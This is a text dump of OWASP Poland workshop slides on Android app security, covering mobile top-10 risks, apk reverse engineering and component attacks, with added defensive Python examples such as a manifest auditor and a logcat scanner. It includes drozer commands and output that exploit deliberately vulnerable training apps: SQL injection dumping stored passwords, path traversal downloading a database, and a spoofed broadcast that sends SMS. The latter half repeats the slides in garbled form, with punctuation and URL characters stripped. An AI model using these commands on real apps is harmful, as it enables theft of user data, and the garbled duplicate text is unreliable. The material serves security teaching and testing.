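            return meta["user"]
        return None

    def live_sessions(self):
        """Number of tokens still accepted, after sweeping idle-expired ones."""
        now = self._clock()
        expired = [t for t, m in self._sessions.items() if now - m["last_seen"] > self._idle_timeout]
        for t in expired:
            del self._sessions[t]
        return len(self._sessions)


class FakeClock:
    """Constructed clock: lets the demo move time forward without sleeping."""

    def __init__(self, start=1_000_000.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


def walkthrough():
    """Run the three checks a tester would do through a proxy and report each result."""
    clock = FakeClock()
    store = SessionStore(clock=clock)
    token = store.login("alice")
    # Check 1: a copied cookie reused after 30 minutes of inactivity must be rejected.
    clock.advance(IDLE_TIMEOUT + 1)
    expired = store.user_for(token) is None
    # Check 2: logging in as another user must destroy the token issued before.
    alice = store.login("alice")
    bob = store.login("bob", previous_token=alice)
    old_token_dead = store.user_for(alice) is None and store.user_for(bob) == "bob"
    # Check 3: a predictable, never-issued value (a device-ID style token) is worthless.
    guess_rejected = store.user_for("device-id-0123456789abcdef") is None
    return {
        "expired_after_idle": expired,
        "old_token_destroyed": old_token_dead,
        "guess_rejected": guess_rejected,
        "token_length": len(bob),
        "live_sessions": store.live_sessions(),
    }


if __name__ == "__main__":
    print(walkthrough())
```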
Thank you
pawelrzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
– APKOptic
– Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - Dex2Jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Allows using any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
– Closed source Java decompiler
– Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
– Open source Java tool for reverse-engineering Android apps
– Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Activity components attacks
• General hijacking scheme
• Results of an attack:
– A malicious Activity could read the data in the Intent and then immediately relay it to the legitimate one
– Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
• List and launch exported activities:
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  com.mwr.example.sieve.FileSelectActivity
  com.mwr.example.sieve.MainLoginActivity
  com.mwr.example.sieve.PWList
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although they generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction: it must be exported, or respond to / accept input from message formats like intents, files or the network stack.
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat to check for sensitive info
• Fire off intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
• What info can they hold?
– User's phone numbers
– Passwords
– SMS
• And one of the main problems is, again, permissions:
run app.provider.info --permission null
Content providers attacks
• Unrestricted access to the app database
– Just query it: run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on authorization might include altering data, e.g. by using the app.provider.insert command
dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to the app database
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: ")" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
| Password         | pin  |
| thisismypassword | 9876 |
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug, etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send an intent and enjoy
Broadcast receivers attacks
<receiver android:name="broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers attacks
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    // phone number and text are taken straight from the incoming Intent's extras:
    // nothing checks who sent the broadcast, and the values are not validated
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action
Broadcast receivers attacks
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all of the above-mentioned items:
• Setting the android:exported attribute to false (only the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
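The two defenses above, and the manifest step of "Client side injection – how to find" (app.package.manifest, --permission null), as an added example that is neither the workshop's code nor part of drozer: a small auditor that parses a constructed AndroidManifest.xml and reports every activity, service, receiver and provider that is exported without any permission. The package, component and permission names in the sample manifest are constructed.

```python
"""Audit an AndroidManifest.xml for components other apps can reach.

Added example, not code from the workshop or from drozer: it applies the
two defenses above (android:exported="false", or a custom permission) to
a constructed manifest and reports every activity, service, receiver and
provider that is exported without any permission. The package, component
and permission names below are constructed.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")
LAUNCHER = "android.intent.category.LAUNCHER"


def _attr(elem, name):
    """Read an android:* attribute (ElementTree stores it as {namespace}name)."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def is_exported(elem):
    """Platform default: an explicit android:exported wins; otherwise a component
    with an <intent-filter> is exported, and a provider without the attribute is
    treated as exported (the pre-API 17 default) to stay on the safe side."""
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return True
    return elem.find("intent-filter") is not None


def audit_manifest(manifest_xml):
    """Return one dict per component other apps can reach, with the permission
    protecting it (None when there is none) and the actions it listens for."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for elem in root.find("application"):
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem):
            continue
        permission = _attr(elem, "permission")
        if elem.tag == "provider":
            # providers may split access into read and write permissions instead
            permission = permission or _attr(elem, "readPermission") or _attr(elem, "writePermission")
        findings.append({
            "type": elem.tag,
            "name": _attr(elem, "name"),
            "permission": permission,
            "actions": [_attr(a, "name") for a in elem.iter("action")],
            "launcher": any(_attr(c, "name") == LAUNCHER for c in elem.iter("category")),
        })
    return findings


def unprotected(findings):
    """Exported components with no permission at all, excluding the launcher
    activity, which has to be exported: these are the ones to set
    android:exported="false" on or to guard with a custom permission."""
    return [f for f in findings if f["permission"] is None and not f["launcher"]]


# Constructed manifest modelled on the GoatDroid receiver shown earlier.
SAMPLE_MANIFEST = f"""<manifest xmlns:android="{ANDROID_NS}" package="com.example.demo">
  <uses-permission android:name="android.permission.SEND_SMS" />
  <application android:label="Demo">
    <activity android:name=".MainLoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <activity android:name=".PWList" android:exported="true" />
    <activity android:name=".SettingsActivity" android:exported="false" />
    <receiver android:name="broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
        <action android:name="com.example.demo.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <receiver android:name=".ProtectedReceiver"
              android:permission="com.example.demo.permission.INTERNAL">
      <intent-filter>
        <action android:name="com.example.demo.INTERNAL_EVENT" />
      </intent-filter>
    </receiver>
    <provider android:name=".DBContentProvider"
              android:authorities="com.example.demo.DBContentProvider" />
    <service android:name=".AuthService" />
  </application>
</manifest>"""


if __name__ == "__main__":
    for f in unprotected(audit_manifest(SAMPLE_MANIFEST)):
        print(f"{f['type']} {f['name']}: exported without permission, actions={f['actions']}")
```

Run it against the manifest pulled out of an apk with apktool to get the same list drozer's app.package.manifest forces you to read by eye.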
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML data stores
– Plain text configuration files
– Cookie stores
– SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing the application
• Analyze the package files at different stages:
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
– Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
– Securing only part of the communication (e.g. only authentication)
– Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the browser's side
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in the source code: the expected X.509 certificate or public key
if (presented_cert == pinned_cert)
    Start_connection()
else
    Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
mallodroid.py -f AppToCheck.apk -d javaout
• Look for end point implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for public domains):
sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
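The logcat step above, as an added example that is not the workshop's code: a scanner that parses `adb logcat -v threadtime` output and flags lines carrying values the app should never log, restricted to the app's own pid because other processes log too. The log lines, tags, pid and the set of sensitive patterns are constructed for the demonstration.

```python
"""Flag sensitive values in `adb logcat` output.

Added example, not from the workshop: the detection side of the logcat
check above, run over constructed log lines. The tags, the pid and the
set of patterns are assumptions; extend the patterns for the app under test.
"""
import re
from collections import Counter

# Values an app must never write to the log (assumed set, extend per application)
SENSITIVE_PATTERNS = {
    "password": re.compile(r"(?i)\b(?:pass(?:word)?|pwd)\s*[=:]\s*\S+"),
    "bearer_token": re.compile(r"(?i)\bbearer\s+[A-Za-z0-9._-]{16,}"),
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "gps": re.compile(r"(?i)\b(?:lat|latitude)\s*[=:]\s*-?\d{1,3}\.\d+"),
    "card_number": re.compile(r"\b(?:\d[ -]?){13,19}\b"),
}

# `adb logcat -v threadtime` layout: date time pid tid level tag: message
LOGCAT_LINE = re.compile(
    r"^(?P<date>\d{2}-\d{2})\s+(?P<time>[\d:.]+)\s+(?P<pid>\d+)\s+(?P<tid>\d+)"
    r"\s+(?P<level>[VDIWEF])\s+(?P<tag>[^:]+):\s*(?P<msg>.*)$"
)


def parse_logcat(line):
    """Split one threadtime-format line into its fields; None for anything else."""
    m = LOGCAT_LINE.match(line)
    return m.groupdict() if m else None


def scan_logcat(lines, app_pid=None):
    """Return (tag, category, message) for every line that matches a sensitive
    pattern, restricted to the app's pid when one is given (other apps log too)."""
    findings = []
    for raw in lines:
        entry = parse_logcat(raw)
        if entry is None:
            continue
        if app_pid is not None and entry["pid"] != str(app_pid):
            continue
        for category, pattern in SENSITIVE_PATTERNS.items():
            if pattern.search(entry["msg"]):
                findings.append((entry["tag"].strip(), category, entry["msg"]))
    return findings


def summarize(findings):
    """Count findings per (tag, category): the noisiest log statement is the one to remove first."""
    return dict(Counter((tag, category) for tag, category, _ in findings))


# Constructed sample of what a leaky app (pid 4242) might print, plus noise from another process
SAMPLE_LOGCAT = [
    "02-24 10:01:02.113  4242  4242 D LoginActivity: attempting login user=alice@example.com password=Hunter2!",
    "02-24 10:01:02.540  4242  4301 I HttpClient: Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.abcdef.ghijkl",
    "02-24 10:01:03.001  4242  4242 V LocationSvc: lat=51.1079 lon=17.0385 accuracy=12",
    "02-24 10:01:03.120  4242  4242 D LoginActivity: login finished, status=200",
    "02-24 10:01:04.900  1337  1337 I OtherApp: password=notOurApp",
    "--------- beginning of main",
]

if __name__ == "__main__":
    for tag, category, msg in scan_logcat(SAMPLE_LOGCAT, app_pid=4242):
        print(f"[{category}] {tag}: {msg}")
    print(summarize(scan_logcat(SAMPLE_LOGCAT, app_pid=4242)))
```

Pipe real output in with `adb logcat -v threadtime | python3 scanner.py` after adding a stdin loop, and check crash logs the same way, since the mitigation slide calls those out too.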
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "battery low", "boot completed", "headset plugged in", etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
Broadcast receivers attacks
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
